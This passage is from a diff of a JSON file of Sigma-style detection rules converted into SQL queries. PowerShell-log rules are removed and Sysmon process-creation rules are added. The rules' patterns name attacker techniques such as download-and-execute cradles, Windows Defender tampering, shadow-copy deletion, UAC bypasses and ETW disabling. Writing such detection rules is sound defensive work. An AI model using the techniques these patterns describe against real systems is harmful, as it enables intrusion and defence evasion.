AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Powershell Store File In Alternate Data Stream", - "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", "status": "test", - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", - "author": "frack113", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_store_file_in_alternate_data_stream.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Recon Information for Export with PowerShell", - "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "author": "frack113", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "status": "experimental", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' 
ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_susp_recon_export.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "Suspicious Scan Loop Network", + "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004", "attack.execution", - "attack.t1059.001" + "attack.t1059", + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_susp_network_scan_loop.yml" }, { - "title": "PowerShell Deleted Mounted Share", - "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "title": "Remote PowerShell Session Host Process 
(WinRM)", + "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", "status": "test", - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1070.005" + "attack.execution", + "attack.t1059.001", + "attack.t1021.006" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mounted_share_deletion.yml" + "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "Arbitrary MSI Download Via Devinit.EXE", + "id": "90d50722-0483-4065-8e35-57efaadd354d", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" 
], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_devinit_lolbin_usage.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "title": "Remote Access Tool - ScreenConnect Execution", + "id": "57bff678-25d1-4d6c-8211-8ca106d12053", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Legitimate usage of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", - "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", - "status": "experimental", - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "title": "Java Running with Remote Debugging", + "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "status": "test", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1203", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE 
'%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" ], - "filename": "posh_pc_xor_commandline.yml" + "filename": "proc_creation_win_java_remote_debugging.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE 
'%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Suspicious PowerShell Download", - "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", + "title": "Suspicious Recursive Takeown", + "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Scripts created by developers and admins", + "Administrative activity" ], 
"level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_download.yml" + "filename": "proc_creation_win_takeown_recursive_own.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", - "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "author": "frack113", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR 
HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", - "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Use living off the land tools to zip a file and 
stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_zip_compress.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "Suspicious Non PowerShell WSMAN COM Provider", - "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", - "status": "test", - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "User Discovery And Export Via Get-ADUser Cmdlet", + "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 
'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pc_wsman_com_provider_no_powershell.yml" + "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", - "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "title": "New Network Trace Capture Started Via Netsh.EXE", + "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", + "author": "Kutepov Anton, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE 
'%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" ], - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_netsh_packet_capture.yml" }, { - "title": "Alternate PowerShell Hosts", - "id": "d7326048-328b-4d5e-98af-86e84b17c765", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Php Inline Command Execution", + "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "status": "experimental", + "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT (HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\' OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" ], - "filename": "posh_pc_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_php_inline_command_execution.yml" }, { - 
"title": "PowerShell Downgrade Attack - PowerShell", - "id": "6331d09b-4785-4c13-980f-f96661356249", - "status": "experimental", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "status": "test", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pc_downgrade_attack.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Nslookup PowerShell Download Cradle", - "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. 
